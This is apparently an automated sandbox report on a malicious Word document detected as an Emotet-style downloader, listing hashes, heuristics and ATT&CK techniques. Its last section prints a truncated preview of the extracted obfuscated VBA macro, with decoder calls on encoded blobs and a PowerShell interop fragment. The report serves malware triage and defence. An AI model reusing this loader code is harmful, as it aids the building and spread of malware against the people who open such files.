Office (OLE) malware analysis — malicious · c3f5a1f0aa37fbb8

MALICIOUS

Office (OLE)

136.5 KB Created: 2018-03-27 05:05:00 Authoring application: Microsoft Office Word First seen: 2019-01-12

MD5: 80d49660ec7d0476f5e9c14d430d8087 SHA-1: 66bd0f4d9940d9ae3a2e1e6114b2a54f57492cd4 SHA-256: c3f5a1f0aa37fbb85c68b05991ca493690563a747cd5bf073c3ef8e0d9de356d

264 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a legacy WordBasic AutoOpen macro and obfuscated VBA code, indicated by multiple high-severity heuristics including OLE_VBA_AUTOOPEN and OLE_VBA_PCODE_AUTOEXEC_EXEC. The presence of CreateObject suggests the macro attempts to instantiate objects to perform malicious actions, likely downloading a second-stage payload. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further confirms its malicious nature.

Heuristics 9

ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28817 bytes
SHA-256: `2182e78ee5ad3aefa6492552df1eb7e01dec29d3d143674b20849ab83359c67d`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 26 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "vZMDsqdMREU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "YVdNdKnW" Function vTpujOlEJrMMD() On Error Resume Next Set GoBCP = EEANlu iVztjJ = 76056 + 99495 wdIvD = 92138 / NbULVk TSwwnWCp = zzIXdi("nODUAOQBmADYAMgA3ADMAYwAyADQANAAxADkAOQA0ADkAZQBkAGUAZQBiADUAMwBmADYAMQA2AGYAMgA5ADMAMgBmADMAMgAzAGYANAAyAGYAMwBjAGQAYwBkAGMANATvwNi", 3, 125) Set UtpwI = uUJNrl pYftiZ = 12103 + 80042 uThIR = 73607 / QiPtDd Set uDYIb = iaRnX DQfioo = 56391 + 65618 jzjtmI = 81178 / QsfNlz YsjiDRRGhjs = zzIXdi("Zjj3ADgANwA4AGEANAA2AGQAZQBhAGUAMwA4AGUAYwAyAGUAMQBmADIAYQAxAGYAZgAxADkAMABjADcAYgA5ADEANAAyADUcLoq%p", 4, 92) Set sSzMH = qEBcaA SRMWc = 56464 + 27969 sPpCo = 52940 / vskRR Set BJEjY = DmDjQ Sluat = 99132 + 6042 mdqzt = 9517 / isaZU HEAfBTBRv = zzIXdi("dEw5wHAMwAyADMAMgAxADcAMgBhADEAZgBmADMANgBiAGEAZABjAGUAOABmADIANQA4Aq0i", 7, 62) Set rBGfPl = nDOzr NPouiD = 42371 + 25661 XSGpT = 77104 / udGvY Set iqAiL = HzXkb dwsic = 16174 + 61097 pbVDuz = 73971 / kTKkn NKpLaR = zzIXdi("X%whAGYAOABhADcAMgA1ADkAYgA1ADcAZgBiAGYAOAA1ADYAZAAxADkAYwA2AGMAOQAwAGQAYwA2ADUAYgAyADMAZgBjADIAOQBmADgAZQBhADIAZQA0ADgAOAA0ADAANQBmAGYANwBmADgAYQBiADAAot2J", 4, 149) Set ZGDjOY = LwVAnU ndGipj = 68687 + 6681 wjLSC = 27911 / ZrNfX Set MHIzQN = XdBpA MRWZwZ = 25254 + 96600 zYkQzv = 78681 / VzqJj OJdzRXHLU = zzIXdi("pMNmGUAYQBkADMANQBjAGUAMQBjADkAMQAwADEAMQAwAGEAYwAzADEANQA3AGUANABhADAAZgA5AGQANQA2AGIAMAAyAGMANQAyAGUAMAA3ADUAZgBmAGMAYQBkADEAYQBhADYAMwA0AOw", 5, 136) Set JDlKi = XwrnF PUoRjo = 79583 + 59160 jMzOY = 65779 / jsKoc Set twJkiY = wAOXYm VwjZU = 77643 + 55177 cQUYSv = 92773 / IAddmL CYmidNd = zzIXdi("Xfp2A5AGQAYgBmADIAMgBhADIAZQAyADMAYwAxAGMANwBjADcAMQA1AGEAZgBhADEAMQAwADMAYgBmADUAYgAyAGEANwBlAGMANgA0ADcAMAA1ADcAZQBhADEAOABhADAANwAyADEAZQBjADEANAAyAGYAMABkADMAYQA5AGMAYQBjAGIAMgA2AGIAYQBmAYaz", 5, 187) Set mqNDf = OWczQ wiJsTW = 87163 + 39318 QKFjzT = 11026 / uJjJl Set niiCk = mzXsRZ UHhBBO = 97622 + 71774 NMhrJU = 14181 / waFuan lJrVOhN = zzIXdi("jQNgBkAGUANgA2ADIAZQA2ADIAYwA3AGEAYQA3ADMAZQAwADMAYQA4ADcAMQAyADUAMQBkADQAZAA5ADk8KbK", 3, 79) Set CLNwV = uqzkGa iSizTK = 34143 + 34894 tnSpp = 89125 / UsuUjz Set IzDlzS = hGSQDE SQiZiY = 85436 + 68896 ZLoCti = 56353 / XsmKl ihkMA = zzIXdi("7ABhADgAYgA5AGYAZQAwAGEAOAA5AGQAOAAxADQAYgA2ADMAYgBmAGUAMwBjADQAMwBlADYANwAxAGUAZgAyADIANgBlADAANwAzADUAMAAwAGQAZAA1ADgAYQA5ADgAMgBkADQAOABmAGMAOQBlADQANwAzADAAZgBlAGIANAA0ADAAMgBiA3 0CSA", 2, 180) Set fXkmKh = AzGfF nMLGwY = 21740 + 58849 KQhCdG = 84954 / RUjTC Set pkaNz = McQNb OmTjo = 77101 + 45236 qtjhc = 56731 / QhGAUd UnwwF = zzIXdi("aDEANQA0AGMANQA2ADAAZQAyAGYAZQBjADkAOABhAGUAZABjAGIANAA1ADcANgAxADIAMgBkADQAOQA0ADUAOQAxADYAOQAxADAAMgAwAGMAZgBhAGMANgA2AGYAYQA4ADYAZQAxADgAYQBiADkAYgA2ADcAMABhADYAMQA0AD,lL@P", 2, 169) Set IFDSbi = nFjkwQ XPdmr = 51028 + 40430 BtlVhw = 90958 / MHoXd Set DFGOaz = iOOUwW YANUUQ = 44734 + 11427 Pbmpp = 37082 / LLEpwK FLvvIwF = zzIXdi("%M3DgANgA1ADYAZQBkADYAMQAwAGEAYgA5AGEANwA5ADgAZQBiADUAMABiAGYAZAA2AGMAYwBmADcAOmsMv", 4, 76) Set HMJBA = dOVwcD VzTJZz = 81314 + 82842 oIvPUD = 17999 / hsNwFH Set VoXFw = jjocA vwfIwn = 30453 + 16664 uCiUMj = 76068 / jADfd criKITKVF = zzIXdi("MnUGQAOQBiADUAYwA4AGEAMQAwAGIAMQA0ADAANQAyADUAYwA1ADUAZQBmAGEANwAxADMAYgBmAGMANAB2UfM", 4, 78) Set wMEKj = cHBWiA cLmKw = 6063 + 45851 mtkkZt = 23321 / bwNSh Set XhVCN = Pmnhj bTmTf = 76543 + 83434 CLDfu = 63077 / EMiCC Whitj = zzIXdi("wj5R([RunTImE.IntEROpsERVICES.MaRsHAL]::([rUntiMe.inTEROPsERViCEjiV1J", 5, 60) Set qCwDA = ijzmA IlzJic = 3934 + 82780 wLdpIh = 12191 / aIfjF Set EtUVum = cYpiZ FzRJh = 81378 + 26194 sqwor = 96028 / mzHnSw thENAuOMwi = zzIXdi("57RpRkEAZQBjADcAZQA4ADIANQA2ADgANAAyADMAMwBmADIAYgA1ADQAOABhADQAYwAzADkAMABlAGUANAAxAGYAYwBlAGQANQBmADkAZgBmADEAMABlADgAZABiA,ip", 7, 119) Set dhSzB = BVtMJl dtwqqw = 58009 + 23614 VjCoQ = ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.